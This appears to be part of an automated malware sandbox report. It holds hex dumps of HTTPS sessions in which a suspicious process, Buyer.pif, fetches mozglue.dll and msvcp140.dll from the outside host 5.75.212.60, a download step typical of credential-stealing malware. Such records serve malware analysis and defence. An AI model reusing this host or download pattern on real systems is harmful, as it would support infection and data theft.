                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89
                                                                                                  Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                                                  Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                                                  Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                                                  Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                                                  Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5
                                                                                                  Data Ascii: ,0<48%8A)$


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.5497225.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:28 UTC241OUTGET /mozglue.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:29 UTC260INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:29 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 608080
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:29 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:29 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46
                                                                                                  Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPF
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff
                                                                                                  Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85
                                                                                                  Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b
                                                                                                  Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc
                                                                                                  Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9
                                                                                                  Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89
                                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                                                  Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                                                  Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.5497235.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:30 UTC242OUTGET /msvcp140.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:31 UTC260INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:30 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 450024
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:30 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:31 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72
                                                                                                  Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff
                                                                                                  Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                  2024-07-26 17:58:31 UTC16384INData Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd
                                                                                                  Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
